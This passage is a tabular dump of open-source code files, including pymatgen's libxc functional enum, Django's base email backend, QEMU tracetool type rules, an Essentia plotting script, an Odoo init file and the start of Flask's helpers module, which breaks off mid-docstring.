repo_name
stringlengths 6
100
| path
stringlengths 4
294
| copies
stringlengths 1
5
| size
stringlengths 4
6
| content
stringlengths 606
896k
| license
stringclasses 15
values |
---|---|---|---|---|---|
gVallverdu/pymatgen
|
pymatgen/core/libxcfunc.py
|
4
|
13158
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
Enumerator with the libxc identifiers.
This is a low level object, client code should not interact with LibxcFunc directly
but use the API provided by the Xcfunc object defined in core.xcfunc.py.
Part of this module is automatically generated so be careful when refactoring stuff.
Use the script ~pymatgen/dev_scripts/regen_libxcfunc.py to regenerate the enum values.
"""
import json
import os
from io import open
from enum import Enum
from monty.json import MontyEncoder
# The libxc version used to generate this file!
libxc_version = "3.0.0"
__author__ = "Matteo Giantomassi"
__copyright__ = "Copyright 2016, The Materials Project"
__version__ = libxc_version
__maintainer__ = "Matteo Giantomassi"
__email__ = "[email protected]"
__status__ = "Production"
__date__ = "May 16, 2016"
# Loads libxc info from json file
with open(os.path.join(os.path.dirname(__file__), "libxc_docs.json"),
"rt") as fh:
_all_xcfuncs = {int(k): v for k, v in json.load(fh).items()}
# @unique
class LibxcFunc(Enum):
"""
Enumerator with the identifiers. This object is used by Xcfunc
declared in xcfunc.py to create an internal representation of the XC functional.
This is a low level object, client code should not interact with LibxcFunc directly
but use the API provided by Xcfunc.
"""
# begin_include_dont_touch
LDA_C_1D_CSC = 18
LDA_C_1D_LOOS = 26
LDA_C_2D_AMGB = 15
LDA_C_2D_PRM = 16
LDA_C_GOMBAS = 24
LDA_C_HL = 4
LDA_C_GL = 5
LDA_C_vBH = 17
LDA_C_ML1 = 22
LDA_C_ML2 = 23
LDA_C_PW = 12
LDA_C_PW_MOD = 13
LDA_C_OB_PW = 14
LDA_C_PW_RPA = 25
LDA_C_PZ = 9
LDA_C_PZ_MOD = 10
LDA_C_OB_PZ = 11
LDA_C_RC04 = 27
LDA_C_RPA = 3
LDA_C_VWN = 7
LDA_C_VWN_1 = 28
LDA_C_VWN_2 = 29
LDA_C_VWN_3 = 30
LDA_C_VWN_4 = 31
LDA_C_VWN_RPA = 8
LDA_C_WIGNER = 2
LDA_K_TF = 50
LDA_K_LP = 51
LDA_X = 1
LDA_C_XALPHA = 6
LDA_X_1D = 21
LDA_X_2D = 19
LDA_XC_KSDT = 259
LDA_XC_TETER93 = 20
LDA_XC_ZLP = 43
GGA_C_AM05 = 135
GGA_C_FT97 = 88
GGA_C_LM = 137
GGA_C_LYP = 131
GGA_C_OP_B88 = 87
GGA_C_OP_PBE = 86
GGA_C_OP_G96 = 85
GGA_C_OP_PW91 = 262
GGA_C_OP_XALPHA = 84
GGA_C_OPTC = 200
GGA_C_P86 = 132
GGA_C_PBE = 130
GGA_C_PBE_SOL = 133
GGA_C_XPBE = 136
GGA_C_PBE_JRGX = 138
GGA_C_RGE2 = 143
GGA_C_APBE = 186
GGA_C_SPBE = 89
GGA_C_REGTPSS = 83
GGA_C_ZPBESOL = 63
GGA_C_PBEINT = 62
GGA_C_ZPBEINT = 61
GGA_C_PBELOC = 246
GGA_C_BGCP = 39
GGA_C_PBEFE = 258
GGA_C_PW91 = 134
GGA_C_Q2D = 47
GGA_C_SOGGA11 = 152
GGA_C_SOGGA11_X = 159
GGA_C_TCA = 100
GGA_C_REVTCA = 99
GGA_C_WI0 = 153
GGA_C_WI = 148
GGA_C_WL = 147
GGA_K_DK = 516
GGA_K_PERDEW = 517
GGA_K_VSK = 518
GGA_K_VJKS = 519
GGA_K_ERNZERHOF = 520
GGA_K_MEYER = 57
GGA_K_OL1 = 512
GGA_X_OL2 = 183
GGA_K_OL2 = 513
GGA_K_PEARSON = 511
GGA_K_TFVW = 52
GGA_K_VW = 500
GGA_K_GE2 = 501
GGA_K_GOLDEN = 502
GGA_K_YT65 = 503
GGA_K_BALTIN = 504
GGA_K_LIEB = 505
GGA_K_ABSP1 = 506
GGA_K_ABSP2 = 507
GGA_K_GR = 508
GGA_K_LUDENA = 509
GGA_K_GP85 = 510
GGA_X_2D_B86 = 128
GGA_X_2D_B86_MGC = 124
GGA_X_2D_B88 = 127
GGA_X_2D_PBE = 129
GGA_X_AIRY = 192
GGA_X_LAG = 193
GGA_X_AK13 = 56
GGA_X_AM05 = 120
GGA_X_B86 = 103
GGA_X_B86_MGC = 105
GGA_X_B86_R = 41
GGA_X_B88 = 106
GGA_X_OPTB88_VDW = 139
GGA_X_MB88 = 149
GGA_K_LLP = 522
GGA_K_FR_B88 = 514
GGA_K_THAKKAR = 523
GGA_X_BAYESIAN = 125
GGA_X_BPCCAC = 98
GGA_X_C09X = 158
GGA_X_CAP = 270
GGA_X_DK87_R1 = 111
GGA_X_DK87_R2 = 112
GGA_X_EV93 = 35
GGA_X_FT97_A = 114
GGA_X_FT97_B = 115
GGA_X_G96 = 107
GGA_X_HCTH_A = 34
GGA_X_HERMAN = 104
GGA_X_HJS_PBE = 525
GGA_X_HJS_PBE_SOL = 526
GGA_X_HJS_B88 = 527
GGA_X_HJS_B97X = 528
GGA_X_HJS_B88_V2 = 46
GGA_X_HTBS = 191
GGA_X_ITYH = 529
GGA_X_KT1 = 145
GGA_XC_KT2 = 146
GGA_X_LB = 160
GGA_X_LBM = 182
GGA_X_LG93 = 113
GGA_X_LV_RPW86 = 58
GGA_X_MPBE = 122
GGA_X_N12 = 82
GGA_X_GAM = 32
GGA_X_OPTX = 110
GGA_X_PBE = 101
GGA_X_PBE_R = 102
GGA_X_PBE_SOL = 116
GGA_X_XPBE = 123
GGA_X_PBE_JSJR = 126
GGA_X_PBEK1_VDW = 140
GGA_X_RGE2 = 142
GGA_X_APBE = 184
GGA_X_PBEINT = 60
GGA_X_PBE_TCA = 59
GGA_X_LAMBDA_LO_N = 45
GGA_X_LAMBDA_CH_N = 44
GGA_X_LAMBDA_OC2_N = 40
GGA_X_PBE_MOL = 49
GGA_X_BGCP = 38
GGA_X_PBEFE = 265
GGA_K_APBE = 185
GGA_K_REVAPBE = 55
GGA_K_TW1 = 187
GGA_K_TW2 = 188
GGA_K_TW3 = 189
GGA_K_TW4 = 190
GGA_K_APBEINT = 54
GGA_K_REVAPBEINT = 53
GGA_X_PBEA = 121
GGA_X_PW86 = 108
GGA_X_RPW86 = 144
GGA_K_FR_PW86 = 515
GGA_X_PW91 = 109
GGA_X_MPW91 = 119
GGA_K_LC94 = 521
GGA_X_Q2D = 48
GGA_X_RPBE = 117
GGA_X_SFAT = 530
GGA_X_SOGGA11 = 151
GGA_X_SSB_SW = 90
GGA_X_SSB = 91
GGA_X_SSB_D = 92
GGA_X_VMT_PBE = 71
GGA_X_VMT_GE = 70
GGA_X_VMT84_PBE = 69
GGA_X_VMT84_GE = 68
GGA_X_WC = 118
GGA_X_WPBEH = 524
GGA_XC_XLYP = 166
GGA_XC_PBE1W = 173
GGA_XC_MPWLYP1W = 174
GGA_XC_PBELYP1W = 175
GGA_XC_B97_D = 170
GGA_XC_HCTH_93 = 161
GGA_XC_HCTH_120 = 162
GGA_XC_HCTH_147 = 163
GGA_XC_HCTH_407 = 164
GGA_C_HCTH_A = 97
GGA_XC_B97_GGA1 = 96
GGA_XC_HCTH_P14 = 95
GGA_XC_HCTH_P76 = 94
GGA_XC_HCTH_407P = 93
GGA_C_N12 = 80
GGA_C_N12_SX = 79
GGA_C_GAM = 33
GGA_XC_EDF1 = 165
GGA_X_OPTPBE_VDW = 141
GGA_XC_MOHLYP = 194
GGA_XC_MOHLYP2 = 195
GGA_X_SOGGA = 150
GGA_XC_OBLYP_D = 67
GGA_XC_OPWLYP_D = 66
GGA_XC_OPBE_D = 65
GGA_XC_TH_FL = 196
GGA_XC_TH_FC = 197
GGA_XC_TH_FCFO = 198
GGA_XC_TH_FCO = 199
GGA_XC_TH1 = 154
GGA_XC_TH2 = 155
GGA_XC_TH3 = 156
GGA_XC_TH4 = 157
GGA_XC_VV10 = 255
HYB_GGA_XC_CAP0 = 477
HYB_GGA_X_N12_SX = 81
HYB_GGA_X_SOGGA11_X = 426
HYB_GGA_XC_B97 = 407
HYB_GGA_XC_B97_1 = 408
HYB_GGA_XC_B97_2 = 410
HYB_GGA_XC_B97_K = 413
HYB_GGA_XC_B97_3 = 414
HYB_GGA_XC_SB98_1a = 420
HYB_GGA_XC_SB98_1b = 421
HYB_GGA_XC_SB98_1c = 422
HYB_GGA_XC_SB98_2a = 423
HYB_GGA_XC_SB98_2b = 424
HYB_GGA_XC_SB98_2c = 425
HYB_GGA_XC_WB97 = 463
HYB_GGA_XC_WB97X = 464
HYB_GGA_XC_WB97X_V = 466
HYB_GGA_XC_WB97X_D = 471
HYB_GGA_XC_B97_1p = 266
HYB_GGA_XC_LC_VV10 = 469
HYB_GGA_XC_B1WC = 412
HYB_GGA_XC_B1LYP = 416
HYB_GGA_XC_B1PW91 = 417
HYB_GGA_XC_mPW1PW = 418
HYB_GGA_XC_mPW1K = 405
HYB_GGA_XC_BHANDH = 435
HYB_GGA_XC_BHANDHLYP = 436
HYB_GGA_XC_MPWLYP1M = 453
HYB_GGA_XC_B3PW91 = 401
HYB_GGA_XC_B3LYP = 402
HYB_GGA_XC_B3LYP5 = 475
HYB_GGA_XC_B3P86 = 403
HYB_GGA_XC_MPW3PW = 415
HYB_GGA_XC_MPW3LYP = 419
HYB_GGA_XC_MB3LYP_RC04 = 437
HYB_GGA_XC_REVB3LYP = 454
HYB_GGA_XC_B3LYPs = 459
HYB_GGA_XC_CAM_B3LYP = 433
HYB_GGA_XC_TUNED_CAM_B3LYP = 434
HYB_GGA_XC_CAMY_B3LYP = 470
HYB_GGA_XC_CAMY_BLYP = 455
HYB_GGA_XC_EDF2 = 476
HYB_GGA_XC_HSE03 = 427
HYB_GGA_XC_HSE06 = 428
HYB_GGA_XC_LRC_WPBEH = 465
HYB_GGA_XC_LRC_WPBE = 473
HYB_GGA_XC_HJS_PBE = 429
HYB_GGA_XC_HJS_PBE_SOL = 430
HYB_GGA_XC_HJS_B88 = 431
HYB_GGA_XC_HJS_B97X = 432
HYB_GGA_XC_LCY_BLYP = 468
HYB_GGA_XC_LCY_PBE = 467
HYB_GGA_XC_O3LYP = 404
HYB_GGA_XC_X3LYP = 411
HYB_GGA_XC_PBEH = 406
HYB_GGA_XC_PBE0_13 = 456
HYB_GGA_XC_HPBEINT = 472
MGGA_XC_TPSSLYP1W = 242
MGGA_C_BC95 = 240
MGGA_C_CC06 = 229
MGGA_C_CS = 72
MGGA_C_M08_HX = 78
MGGA_C_M08_SO = 77
MGGA_C_M11 = 76
MGGA_C_M11_L = 75
MGGA_C_MN12_L = 74
MGGA_C_MN12_SX = 73
MGGA_C_MN15_L = 261
MGGA_C_MN15 = 269
MGGA_C_PKZB = 239
MGGA_C_TPSS = 231
MGGA_C_REVTPSS = 241
MGGA_C_TPSSLOC = 247
MGGA_C_SCAN = 267
MGGA_C_M05 = 237
MGGA_C_M05_2X = 238
MGGA_C_VSXC = 232
MGGA_C_M06_L = 233
MGGA_C_M06_HF = 234
MGGA_C_M06 = 235
MGGA_C_M06_2X = 236
MGGA_C_DLDF = 37
MGGA_X_2D_PRHG07 = 210
MGGA_X_2D_PRHG07_PRP10 = 211
MGGA_X_BR89 = 206
MGGA_X_BJ06 = 207
MGGA_X_TB09 = 208
MGGA_X_RPP09 = 209
MGGA_X_GVT4 = 204
MGGA_X_LTA = 201
MGGA_X_M05 = 214
MGGA_X_M05_2X = 215
MGGA_X_M06_2X = 218
MGGA_X_M06_L = 203
MGGA_X_M06_HF = 216
MGGA_X_M06 = 217
MGGA_X_M08_HX = 219
MGGA_X_M08_SO = 220
MGGA_X_M11 = 225
MGGA_X_M11_L = 226
MGGA_X_MBEEF = 249
MGGA_X_MBEEFVDW = 250
MGGA_X_MK00 = 230
MGGA_X_MK00B = 243
MGGA_X_MN12_L = 227
MGGA_X_MN15_L = 260
MGGA_X_MS0 = 221
MGGA_X_MS1 = 222
MGGA_X_MS2 = 223
MGGA_X_MVS = 257
MGGA_X_PKZB = 213
MGGA_X_SCAN = 263
MGGA_X_TAU_HCTH = 205
MGGA_X_TPSS = 202
MGGA_X_MODTPSS = 245
MGGA_X_REVTPSS = 212
MGGA_X_BLOC = 244
MGGA_XC_B97M_V = 254
MGGA_XC_OTPSS_D = 64
MGGA_XC_ZLP = 42
HYB_MGGA_X_MVSH = 474
HYB_MGGA_XC_M05 = 438
HYB_MGGA_XC_M05_2X = 439
HYB_MGGA_XC_B88B95 = 440
HYB_MGGA_XC_B86B95 = 441
HYB_MGGA_XC_PW86B95 = 442
HYB_MGGA_XC_BB1K = 443
HYB_MGGA_XC_MPW1B95 = 445
HYB_MGGA_XC_MPWB1K = 446
HYB_MGGA_XC_X1B95 = 447
HYB_MGGA_XC_XB1K = 448
HYB_MGGA_XC_M06_HF = 444
HYB_MGGA_XC_M06 = 449
HYB_MGGA_XC_M06_2X = 450
HYB_MGGA_XC_PW6B95 = 451
HYB_MGGA_XC_PWB6K = 452
HYB_MGGA_XC_TPSSH = 457
HYB_MGGA_XC_REVTPSSH = 458
HYB_MGGA_X_DLDF = 36
HYB_MGGA_XC_M08_HX = 460
HYB_MGGA_XC_M08_SO = 461
HYB_MGGA_XC_M11 = 462
HYB_MGGA_X_MN12_SX = 248
HYB_MGGA_X_MN15 = 268
HYB_MGGA_X_MS2H = 224
HYB_MGGA_X_SCAN0 = 264
HYB_MGGA_XC_WB97M_V = 531
# end_include_dont_touch
def __init__(self, num):
"""
Init.
:param num: Number for the xc.
"""
info = _all_xcfuncs[self.value]
self.kind = info["Kind"]
self.family = info["Family"]
def __str__(self):
return "name=%s, kind=%s, family=%s" % (
self.name, self.kind, self.family)
@staticmethod
def all_families():
"""
List of strings with the libxc families.
Note that XC_FAMILY if removed from the string e.g. XC_FAMILY_LDA becomes LDA
"""
return sorted(set(d["Family"] for d in _all_xcfuncs.values()))
@staticmethod
def all_kinds():
"""
List of strings with the libxc kinds.
Also in this case, the string is obtained by remove the XC_ prefix.
XC_CORRELATION --> CORRELATION
"""
return sorted(set(d["Kind"] for d in _all_xcfuncs.values()))
@property
def info_dict(self):
"""Dictionary with metadata. see libxc_docs.json"""
return _all_xcfuncs[self.value]
@property
def is_x_kind(self):
"""True if this is an exchange-only functional"""
return self.kind == "EXCHANGE"
@property
def is_c_kind(self):
"""True if this is a correlation-only functional"""
return self.kind == "CORRELATION"
@property
def is_k_kind(self):
"""True if this is a kinetic functional"""
return self.kind == "KINETIC"
@property
def is_xc_kind(self):
"""True if this is a exchange+correlation functional"""
return self.kind == "EXCHANGE_CORRELATION"
@property
def is_lda_family(self):
"""True if this functional belongs to the LDA family."""
return self.family == "LDA"
@property
def is_gga_family(self):
"""True if this functional belongs to the GGA family."""
return self.family == "GGA"
@property
def is_mgga_family(self):
"""True if this functional belongs to the meta-GGA family."""
return self.family == "MGGA"
@property
def is_hyb_gga_family(self):
"""True if this functional belongs to the hybrid + GGA family."""
return self.family == "HYB_GGA"
@property
def is_hyb_mgga_family(self):
"""True if this functional belongs to the hybrid + meta-GGA family."""
return self.family == "HYB_MGGA"
def as_dict(self):
"""
Makes LibxcFunc obey the general json interface used in pymatgen for
easier serialization.
"""
return {"name": self.name,
"@module": self.__class__.__module__,
"@class": self.__class__.__name__}
@staticmethod
def from_dict(d):
"""
Makes LibxcFunc obey the general json interface used in pymatgen for
easier serialization.
"""
return LibxcFunc[d["name"]]
def to_json(self):
"""
Returns a json string representation of the MSONable object.
"""
return json.dumps(self.as_dict(), cls=MontyEncoder)
if __name__ == "__main__":
for xc in LibxcFunc:
print(xc)
|
mit
|
pigeonflight/strider-plone
|
docker/appengine/lib/django-1.2/django/core/mail/backends/base.py
|
660
|
1164
|
"""Base email backend class."""
class BaseEmailBackend(object):
"""
Base class for email backend implementations.
Subclasses must at least overwrite send_messages().
"""
def __init__(self, fail_silently=False, **kwargs):
self.fail_silently = fail_silently
def open(self):
"""Open a network connection.
This method can be overwritten by backend implementations to
open a network connection.
It's up to the backend implementation to track the status of
a network connection if it's needed by the backend.
This method can be called by applications to force a single
network connection to be used when sending mails. See the
send_messages() method of the SMTP backend for a reference
implementation.
The default implementation does nothing.
"""
pass
def close(self):
"""Close a network connection."""
pass
def send_messages(self, email_messages):
"""
Sends one or more EmailMessage objects and returns the number of email
messages sent.
"""
raise NotImplementedError
|
mit
|
Sajid3/orp
|
third-party/qemu-orp/scripts/tracetool/transform.py
|
78
|
4238
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Type-transformation rules.
"""
__author__ = "Lluís Vilanova <[email protected]>"
__copyright__ = "Copyright 2012-2014, Lluís Vilanova <[email protected]>"
__license__ = "GPL version 2 or (at your option) any later version"
__maintainer__ = "Stefan Hajnoczi"
__email__ = "[email protected]"
def _transform_type(type_, trans):
if isinstance(trans, str):
return trans
elif isinstance(trans, dict):
if type_ in trans:
return _transform_type(type_, trans[type_])
elif None in trans:
return _transform_type(type_, trans[None])
else:
return type_
elif callable(trans):
return trans(type_)
else:
raise ValueError("Invalid type transformation rule: %s" % trans)
def transform_type(type_, *trans):
"""Return a new type transformed according to the given rules.
Applies each of the transformation rules in trans in order.
If an element of trans is a string, return it.
If an element of trans is a function, call it with type_ as its only
argument.
If an element of trans is a dict, search type_ in its keys. If type_ is
a key, use the value as a transformation rule for type_. Otherwise, if
None is a key use the value as a transformation rule for type_.
Otherwise, return type_.
Parameters
----------
type_ : str
Type to transform.
trans : list of function or dict
Type transformation rules.
"""
if len(trans) == 0:
raise ValueError
res = type_
for t in trans:
res = _transform_type(res, t)
return res
##################################################
# tcg -> host
def _tcg_2_host(type_):
if type_ == "TCGv":
# force a fixed-size type (target-independent)
return "uint64_t"
else:
return type_
TCG_2_HOST = {
"TCGv_i32": "uint32_t",
"TCGv_i64": "uint64_t",
"TCGv_ptr": "void *",
None: _tcg_2_host,
}
##################################################
# host -> host compatible with tcg sizes
HOST_2_TCG_COMPAT = {
"uint8_t": "uint32_t",
}
##################################################
# host/tcg -> tcg
def _host_2_tcg(type_):
if type_.startswith("TCGv"):
return type_
raise ValueError("Don't know how to translate '%s' into a TCG type\n" % type_)
HOST_2_TCG = {
"uint32_t": "TCGv_i32",
"uint64_t": "TCGv_i64",
"void *" : "TCGv_ptr",
None: _host_2_tcg,
}
##################################################
# tcg -> tcg helper definition
def _tcg_2_helper_def(type_):
if type_ == "TCGv":
return "target_ulong"
else:
return type_
TCG_2_TCG_HELPER_DEF = {
"TCGv_i32": "uint32_t",
"TCGv_i64": "uint64_t",
"TCGv_ptr": "void *",
None: _tcg_2_helper_def,
}
##################################################
# tcg -> tcg helper declaration
def _tcg_2_tcg_helper_decl_error(type_):
raise ValueError("Don't know how to translate type '%s' into a TCG helper declaration type\n" % type_)
TCG_2_TCG_HELPER_DECL = {
"TCGv" : "tl",
"TCGv_ptr": "ptr",
"TCGv_i32": "i32",
"TCGv_i64": "i64",
None: _tcg_2_tcg_helper_decl_error,
}
##################################################
# host/tcg -> tcg temporal constant allocation
def _host_2_tcg_tmp_new(type_):
if type_.startswith("TCGv"):
return "tcg_temp_new_nop"
raise ValueError("Don't know how to translate type '%s' into a TCG temporal allocation" % type_)
HOST_2_TCG_TMP_NEW = {
"uint32_t": "tcg_const_i32",
"uint64_t": "tcg_const_i64",
"void *" : "tcg_const_ptr",
None: _host_2_tcg_tmp_new,
}
##################################################
# host/tcg -> tcg temporal constant deallocation
def _host_2_tcg_tmp_free(type_):
if type_.startswith("TCGv"):
return "tcg_temp_free_nop"
raise ValueError("Don't know how to translate type '%s' into a TCG temporal deallocation" % type_)
HOST_2_TCG_TMP_FREE = {
"uint32_t": "tcg_temp_free_i32",
"uint64_t": "tcg_temp_free_i64",
"void *" : "tcg_temp_free_ptr",
None: _host_2_tcg_tmp_free,
}
|
apache-2.0
|
sankalpg/Essentia_tonicDebug_TEMP
|
src/python/essentia/plotting.py
|
6
|
4133
|
# Copyright (C) 2006-2013 Music Technology Group - Universitat Pompeu Fabra
#
# This file is part of Essentia
#
# Essentia is free software: you can redistribute it and/or modify it under
# the terms of the GNU Affero General Public License as published by the Free
# Software Foundation (FSF), either version 3 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the Affero GNU General Public License
# version 3 along with this program. If not, see http://www.gnu.org/licenses/
import os
import pylab
import math
def descriptorPlot(name, xData, yData, pool, options):
pylab.figure()
pylab.title(name)
pylab.plot(xData, yData)
duration = int(math.floor(pool.value('metadata.duration_processed')))
maxValue = max(yData)
minValue = min(yData)
# plotting segments lines
if options['segmentation']['doSegmentation']:
segments = pool.value('segmentation.timestamps')
for segment in segments:
pylab.plot([segment[0], segment[0]], [minValue, maxValue], 'r-')
pylab.plot([segment[1], segment[1]], [minValue, maxValue], 'r-')
pylab.axis([-2, duration + 2, minValue, maxValue])
if not os.path.exists('plots'):
os.mkdir('plots')
figureName = 'plots/' + name + '.png'
print 'Plotting ' + name + '...'
pylab.savefig(figureName)
return figureName
def descriptorPlotHTML(namespace, name, audio, pool, options):
try:
# plot name
descName = namespace + '.' + name
# plot x data
scopes = pool.value(namespace + '.' + name + '.' + 'scope']
descScopes = []
for scope in scopes:
descScopes.append(scope[0])
# plot y data
descValues = pool.value(namespace + '.' + name)
# plotting
try:
figureName = descriptorPlot(descName, descScopes, descValues, pool, options)
htmlCode = '<img src ="' + figureName + '"/>'
except RuntimeError:
# special case: descriptors with more than one dimension (mfcc, barkbands, etc...)
htmlCode = ''
for i in range(len(descValues[0])):
descSubName = descName + '.' + str(i)
descSubValues = []
for value in descValues:
descSubValues.append(value[i])
figureName = descriptorPlot(descSubName, descScopes, descSubValues, pool, options)
htmlCode += '<img src ="' + figureName + '"/>'
except KeyError:
htmlCode = ''
print "WARNING: the descriptor", descName, "doesn't exist"
return htmlCode
def namespace_comp(ns1, ns2):
if ns1 == 'special': return -1
if ns2 == 'special': return 1
return cmp(ns1, ns2)
def compute(inputFilename, audio, pool, options):
htmlCode = '<p align="center"><b><font size=6>' + inputFilename + '</font></b></p>'
html = False
descriptors = options['plotsList']
namespaces = [ ns for ns in descriptors ]
namespaces.sort(namespace_comp)
htmlFile = open(inputFilename + '.html', 'w')
htmlCode = '<p align="center"><b><font size=6>' + inputFilename + '</font></b></p>'
html = False
# plot signal
descName = "signal"
descValues = audio
descScopes = []
for time in range(len(audio)):
descScopes.append(time / options['sampleRate'])
figureName = descriptorPlot(descName, descScopes, descValues, pool, options)
htmlCode += '<img src ="' + figureName + '"/>'
# plot descriptors, one by one
for namespace in namespaces:
names = [ n for n in descriptors[namespace] ]
names.sort()
for name in names:
htmlCode += descriptorPlotHTML(namespace, name, audio, pool, options)
# write HTML file
htmlFile = open(inputFilename + '.html', 'w')
htmlFile.write(htmlCode)
htmlFile.close()
|
agpl-3.0
|
MarcosCommunity/odoo
|
addons/l10n_pa/__init__.py
|
2120
|
1456
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (c) 2011 Cubic ERP - Teradata SAC. (http://cubicerp.com).
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
##############################################################################
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
tfrdidi/PhiDi
|
libs/flask/helpers.py
|
776
|
33793
|
# -*- coding: utf-8 -*-
"""
flask.helpers
~~~~~~~~~~~~~
Implements various helpers.
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import os
import sys
import pkgutil
import posixpath
import mimetypes
from time import time
from zlib import adler32
from threading import RLock
from werkzeug.routing import BuildError
from functools import update_wrapper
try:
from werkzeug.urls import url_quote
except ImportError:
from urlparse import quote as url_quote
from werkzeug.datastructures import Headers
from werkzeug.exceptions import NotFound
# this was moved in 0.7
try:
from werkzeug.wsgi import wrap_file
except ImportError:
from werkzeug.utils import wrap_file
from jinja2 import FileSystemLoader
from .signals import message_flashed
from .globals import session, _request_ctx_stack, _app_ctx_stack, \
current_app, request
from ._compat import string_types, text_type
# sentinel
_missing = object()
# what separators does this operating system provide that are not a slash?
# this is used by the send_from_directory function to ensure that nobody is
# able to access files from outside the filesystem.
_os_alt_seps = list(sep for sep in [os.path.sep, os.path.altsep]
if sep not in (None, '/'))
def _endpoint_from_view_func(view_func):
"""Internal helper that returns the default endpoint for a given
function. This always is the function name.
"""
assert view_func is not None, 'expected view func if endpoint ' \
'is not provided.'
return view_func.__name__
def stream_with_context(generator_or_function):
"""Request contexts disappear when the response is started on the server.
This is done for efficiency reasons and to make it less likely to encounter
memory leaks with badly written WSGI middlewares. The downside is that if
you are using streamed responses, the generator cannot access request bound
information any more.
This function however can help you keep the context around for longer::
from flask import stream_with_context, request, Response
@app.route('/stream')
def streamed_response():
@stream_with_context
def generate():
yield 'Hello '
yield request.args['name']
yield '!'
return Response(generate())
Alternatively it can also be used around a specific generator::
from flask import stream_with_context, request, Response
@app.route('/stream')
def streamed_response():
def generate():
yield 'Hello '
yield request.args['name']
yield '!'
return Response(stream_with_context(generate()))
.. versionadded:: 0.9
"""
try:
gen = iter(generator_or_function)
except TypeError:
def decorator(*args, **kwargs):
gen = generator_or_function()
return stream_with_context(gen)
return update_wrapper(decorator, generator_or_function)
def generator():
ctx = _request_ctx_stack.top
if ctx is None:
raise RuntimeError('Attempted to stream with context but '
'there was no context in the first place to keep around.')
with ctx:
# Dummy sentinel. Has to be inside the context block or we're
# not actually keeping the context around.
yield None
# The try/finally is here so that if someone passes a WSGI level
# iterator in we're still running the cleanup logic. Generators
# don't need that because they are closed on their destruction
# automatically.
try:
for item in gen:
yield item
finally:
if hasattr(gen, 'close'):
gen.close()
# The trick is to start the generator. Then the code execution runs until
# the first dummy None is yielded at which point the context was already
# pushed. This item is discarded. Then when the iteration continues the
# real generator is executed.
wrapped_g = generator()
next(wrapped_g)
return wrapped_g
def make_response(*args):
"""Sometimes it is necessary to set additional headers in a view. Because
views do not have to return response objects but can return a value that
is converted into a response object by Flask itself, it becomes tricky to
add headers to it. This function can be called instead of using a return
and you will get a response object which you can use to attach headers.
If view looked like this and you want to add a new header::
def index():
return render_template('index.html', foo=42)
You can now do something like this::
def index():
response = make_response(render_template('index.html', foo=42))
response.headers['X-Parachutes'] = 'parachutes are cool'
return response
This function accepts the very same arguments you can return from a
view function. This for example creates a response with a 404 error
code::
response = make_response(render_template('not_found.html'), 404)
The other use case of this function is to force the return value of a
view function into a response which is helpful with view
decorators::
response = make_response(view_function())
response.headers['X-Parachutes'] = 'parachutes are cool'
Internally this function does the following things:
- if no arguments are passed, it creates a new response argument
- if one argument is passed, :meth:`flask.Flask.make_response`
is invoked with it.
- if more than one argument is passed, the arguments are passed
to the :meth:`flask.Flask.make_response` function as tuple.
.. versionadded:: 0.6
"""
if not args:
return current_app.response_class()
if len(args) == 1:
args = args[0]
return current_app.make_response(args)
def url_for(endpoint, **values):
"""Generates a URL to the given endpoint with the method provided.
Variable arguments that are unknown to the target endpoint are appended
to the generated URL as query arguments. If the value of a query argument
is `None`, the whole pair is skipped. In case blueprints are active
you can shortcut references to the same blueprint by prefixing the
local endpoint with a dot (``.``).
This will reference the index function local to the current blueprint::
url_for('.index')
For more information, head over to the :ref:`Quickstart <url-building>`.
To integrate applications, :class:`Flask` has a hook to intercept URL build
errors through :attr:`Flask.build_error_handler`. The `url_for` function
results in a :exc:`~werkzeug.routing.BuildError` when the current app does
not have a URL for the given endpoint and values. When it does, the
:data:`~flask.current_app` calls its :attr:`~Flask.build_error_handler` if
it is not `None`, which can return a string to use as the result of
`url_for` (instead of `url_for`'s default to raise the
:exc:`~werkzeug.routing.BuildError` exception) or re-raise the exception.
An example::
def external_url_handler(error, endpoint, **values):
"Looks up an external URL when `url_for` cannot build a URL."
# This is an example of hooking the build_error_handler.
# Here, lookup_url is some utility function you've built
# which looks up the endpoint in some external URL registry.
url = lookup_url(endpoint, **values)
if url is None:
# External lookup did not have a URL.
# Re-raise the BuildError, in context of original traceback.
exc_type, exc_value, tb = sys.exc_info()
if exc_value is error:
raise exc_type, exc_value, tb
else:
raise error
# url_for will use this result, instead of raising BuildError.
return url
app.build_error_handler = external_url_handler
Here, `error` is the instance of :exc:`~werkzeug.routing.BuildError`, and
`endpoint` and `**values` are the arguments passed into `url_for`. Note
that this is for building URLs outside the current application, and not for
handling 404 NotFound errors.
.. versionadded:: 0.10
The `_scheme` parameter was added.
.. versionadded:: 0.9
The `_anchor` and `_method` parameters were added.
.. versionadded:: 0.9
Calls :meth:`Flask.handle_build_error` on
:exc:`~werkzeug.routing.BuildError`.
:param endpoint: the endpoint of the URL (name of the function)
:param values: the variable arguments of the URL rule
:param _external: if set to `True`, an absolute URL is generated. Server
address can be changed via `SERVER_NAME` configuration variable which
defaults to `localhost`.
:param _scheme: a string specifying the desired URL scheme. The `_external`
parameter must be set to `True` or a `ValueError` is raised.
:param _anchor: if provided this is added as anchor to the URL.
